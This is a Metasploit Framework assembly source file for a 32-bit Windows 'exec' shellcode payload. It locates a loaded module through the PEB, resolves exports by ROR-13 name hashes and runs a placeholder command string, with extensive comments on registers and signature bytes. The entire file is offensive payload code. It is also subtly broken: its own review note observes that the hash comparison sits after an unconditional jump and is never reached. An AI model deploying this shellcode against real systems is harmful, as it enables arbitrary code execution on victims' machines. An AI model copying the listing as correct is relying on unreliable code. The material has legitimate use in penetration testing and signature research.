GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/windows/single_exec.asm
;
; Metasploit Framework
; http://www.metasploit.com
;
; Source for exec (single)
;
; Authors: vlad902 <vlad902@gmail.com>
; Size : 113
;
; Syntax: NASM-style Intel operands, 32-bit x86.
;
; Layout (position-dependent; every offset below is tied to the exact
; encoded length of the instructions, so nothing here can be reordered
; or re-encoded without recomputing them):
;   1. entry stub      - cld / call startup
;   2. export resolver - the code between the call and `ret`; it is
;                        entered through `jmp edi` / `ret`, never by
;                        falling through from the call
;   3. startup         - locates a loaded module through the PEB, builds
;                        a stack frame of name hashes, jumps to resolver
;   4. data            - the command string placeholder
;
; Resolver register roles:
;   ebp = base address of the module whose exports are searched
;   edi = export directory (VA)      ebx = table currently indexed
;   ecx = name index / ordinal       esi = pointer into export name
;   edx = running hash               eax = current name byte
;
; Analysis note: the fs:[0x30] module-list walk, the `ror edx,0xd`
; name-hash loop and the two pushed 32-bit hash constants are fixed byte
; patterns in this listing, which is what makes them usable as static
; signatures.
;

        cld                             ; string ops (lodsb/lodsd) must advance esi
        call startup                    ; pushes the resolver's address, then runs startup

; ---- export resolver --------------------------------------------------
; In:  ebp       = module base
;      [esp]     = address to `ret` to
;      [esp+0x4] = 32-bit hash of the wanted export name
; Out: [esp+0x4] overwritten with the resolved function address, then
;      `ret` pops [esp] and transfers there.
        mov eax,[ebp+0x3c]              ; e_lfanew: offset of the PE header
        mov edi,[ebp+eax+0x78]          ; RVA of the export directory
        add edi,ebp                     ; RVA -> VA
        mov ecx,[edi+0x18]              ; NumberOfNames
        mov ebx,[edi+0x20]              ; AddressOfNames (RVA)
        add ebx,ebp                     ; RVA -> VA
next_export:
        dec ecx                         ; walk the name table from the last entry down
        mov esi,[ebx+ecx*4]             ; RVA of name string #ecx
        add esi,ebp                     ; RVA -> VA
        xor eax,eax                     ; clear eax so lodsb leaves only the byte in it
        cdq                             ; edx = 0 (sign extension of eax): hash starts at zero
next_byte:
        lodsb                           ; al = next name byte, esi++
        test al,al
        jz hash_complete                ; NUL terminator: name fully hashed
        ror edx,0xd                     ; hash = ror(hash, 13) + byte
        add edx,eax
        jmp short next_byte
; NOTE(review): as listed, the compare below is never reached - the loop
; above leaves only through `jz hash_complete`, and the `jmp short` is
; unconditional. The label position may not match the assembled payload;
; confirm against the shipped bytes before relying on this listing.
        cmp edx,[esp+0x4]               ; computed hash vs. requested hash
        jnz next_export                 ; mismatch: try the previous name
hash_complete:
        mov ebx,[edi+0x24]              ; AddressOfNameOrdinals (RVA)
        add ebx,ebp
        mov cx,[ebx+ecx*2]              ; 16-bit ordinal for name #ecx (upper half of ecx kept)
        mov ebx,[edi+0x1c]              ; AddressOfFunctions (RVA)
        add ebx,ebp
        mov ebx,[ebx+ecx*4]             ; function RVA for that ordinal
        add ebx,ebp                     ; RVA -> VA
        mov [esp+0x4],ebx               ; replace the hash slot with the function address
        ret                             ; pop [esp] and continue there

; ---- startup ----------------------------------------------------------
; Builds this stack frame (top first) and enters the resolver:
;   [esp]      edi          resolver address (consumed by the first `ret`)
;   [esp+0x4]  0x0e8afe98   first name hash
;   [esp+0x8]  0x5f048af0   second name hash
;   [esp+0xc]  edi+0x6a     presumably the address of the command string
;   [esp+0x10] 0
; Each resolver pass turns the hash at [esp+0x4] into an address, so the
; first `ret` re-enters the resolver for the second hash and the second
; `ret` transfers to the first resolved function with the second one as
; its return address. Which exports the two hashes name is not stated in
; this file.
startup:
        pop edi                         ; edi = return address of the call = resolver entry
        xor esi,esi                     ; esi = 0 (zero argument and base for fs:[0x30])
        pusha                           ; save all general registers
        push esi                        ; 0
        mov eax,[fs:esi+0x30]           ; PEB pointer from the TEB
        mov eax,[eax+0xc]               ; PEB->Ldr
        mov esi,[eax+0x1c]              ; first entry of the initialization-order module list
        lodsd                           ; eax = next list entry
        mov ebp,[eax+0x8]               ; that entry's module base; which DLL this is depends
                                        ; on loader ordering - not established by this file
        mov eax,edi
        add eax,byte +0x6a              ; hard-coded distance from resolver entry to the data
        push eax
        push dword 0x5f048af0           ; second name hash
        push dword 0xe8afe98            ; first name hash
        push edi                        ; resolver address, popped by the first `ret`
        jmp edi                         ; enter the resolver

; Placeholder for the command line. No terminator is visible in this
; listing; presumably the string is replaced and terminated when the
; payload is generated - confirm against the generator.
        db "command string"